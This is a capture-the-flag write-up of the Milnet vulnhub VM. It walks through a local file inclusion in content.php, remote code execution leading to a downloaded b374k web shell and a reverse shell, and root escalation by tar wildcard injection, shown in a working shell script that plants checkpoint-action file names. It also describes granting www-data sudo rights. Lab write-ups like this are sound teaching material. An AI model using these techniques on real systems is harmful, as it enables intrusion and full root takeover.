Hi everyone, I finally decided to write some articles related to IT security, so I am starting with the Milnet VM. First, I scan the network to identify the VM's IP address.
Scanning the network
Since it is a local network, the fastest way to scan it is with the ARP technique. As shown, it is the only machine on this network :D. Next, it is nmap's turn to check what services this machine provides.
Brute Force Result!
It looks like we are going to need some web application skills :D. The web site is really simple and does not hold much information.
Brute-forcing directories is my favourite. Many tools can do this task, such as wfuzz, dirb and dirbuster; for this one I used dirb on Kali Linux and got the following:
During the examination, I noticed that the index page sends a POST request to content.php with the parameter route=main! Since I know there is an info.php file in the same directory, I tried route=info. Surprisingly, I got the same page as info.php. Therefore, here we have an include() with .php appended to the parameter!
To confirm that it is an LFI vulnerability, I tried the following, since I know the full path of the web server:
route=../../../var/www/html/info
And bingo! We have LFI without any filter, but we still need to get rid of the .php suffix. For this one, I spent some time trying several LFI bypass techniques, and the only one that worked for me is:
Using the LFI, I was able to perform remote command execution with the base64 form of the following PHP code:
Reverse Shell
Therefore, I was able to wget my shell. The following picture shows that I successfully downloaded the cmd.php file:
And here is the access to cmd.php:
I successfully received a reverse shell on port 5555 using the b374k shell's features.
Tar command execution!
During the analysis of the server, I noticed that /etc/crontab is readable! It looks like backup.sh backs up the web directory every minute:
Checking /backup/backup.sh, it runs with root privileges!!! This is good. Checking the content:
#!/bin/bash
cd /var/www/html
tar cf /backup/backup.tgz *
During the examination of the server, I found many txt files in /home/langman/SDINET, and one of them got my attention: DefenseCode_Unix_WildCards_Gone_Wild.txt. It has a section about how to get command execution using the tar command!!!! Bingooo :))
Since backup.sh runs with root privileges, we can take advantage of it to get command execution as root. The unquoted * in the tar line is the weak point: the shell expands it into whatever file names exist in the directory, and tar accepts options anywhere on its command line, so file names that look like options become options. This only works because www-data can create files in /var/www/html, the directory the backup is taken from.
We need to create 3 files in the directory that tar backs up, which in this case is /var/www/html, as follows:
1. "--checkpoint=1"
2. "--checkpoint-action=exec=sh shell.sh"
3. shell.sh - which contains the commands to run!
Getting root Privileges!
Everything is set; now we need to put the commands we want executed with root privileges into shell.sh. But first I want to check that everything is correct, so I inserted id > /tmp/id.txt into shell.sh, and after one minute!!!!!!
Finally, I put a command that adds a www-data entry to /etc/sudoers into shell.sh, to get access to the root user. I am sure others will have a different way to do this! (A malformed line in /etc/sudoers breaks sudo for every user, so it is worth double-checking the syntax before relying on it.) The command goes
into shell.sh file. And after one minute!!
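To make the tar trick reproducible without a root cron job, here is a local re-creation of the steps above. This is an added example, not code from the original write-up: a throwaway directory created with mktemp stands in for /var/www/html, the backup file is written next to it instead of /backup/backup.tgz, and a marker file written by shell.sh stands in for the id > /tmp/id.txt check. The function names plant_payload, run_backup and demo are mine. It needs GNU tar, because --checkpoint-action is a GNU extension; bsdtar and busybox tar reject the options and the demo reports not-executed.

```shell
#!/bin/sh
# Added example: reproduce the wildcard injection against a local copy of the
# backup.sh logic. Nothing here needs root.

# Plant the three files the write-up describes.
#   $1 = directory tar will back up (stands in for /var/www/html)
#   $2 = file that shell.sh writes so we can see it ran
plant_payload() {
    dir="$1"; marker="$2"
    mkdir -p "$dir"
    # shell.sh holds the commands to run; on the real box these ran as root.
    printf 'id > "%s"\n' "$marker" > "$dir/shell.sh"
    # File names that the shell's `*` turns into tar options. The names must be
    # exact, including the space before shell.sh.
    : > "$dir/--checkpoint=1"
    : > "$dir/--checkpoint-action=exec=sh shell.sh"
}

# Same shape as /backup/backup.sh, with the two paths made parameters. The
# unquoted `*` is the bug: the shell expands it into our file names, and GNU
# tar accepts options anywhere on the command line. The exec action runs in
# tar's working directory, which is why "sh shell.sh" resolves.
run_backup() {
    ( cd "$1" && tar cf "$2" * )
}

# Returns "executed" when tar's checkpoint action ran shell.sh, otherwise
# "not-executed". The temporary directory is removed either way.
demo() {
    work=$(mktemp -d)
    marker="$work/id.txt"
    plant_payload "$work/html" "$marker"
    # Backup file lives outside the backed-up directory, as on the real box.
    run_backup "$work/html" "$work/backup.tgz" >/dev/null 2>&1 || true
    if [ -s "$marker" ]; then
        result=executed
    else
        result=not-executed
    fi
    rm -rf "$work"
    echo "$result"
}

demo
```

Note that the two option-named files are consumed as options and never land in the archive; only shell.sh does. On the real target the same thing happens every minute, so anything written to /tmp/id.txt would show uid=0.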
Finally, I would like to thank @teh_warriar and #vulnhub for the VM. It was fun.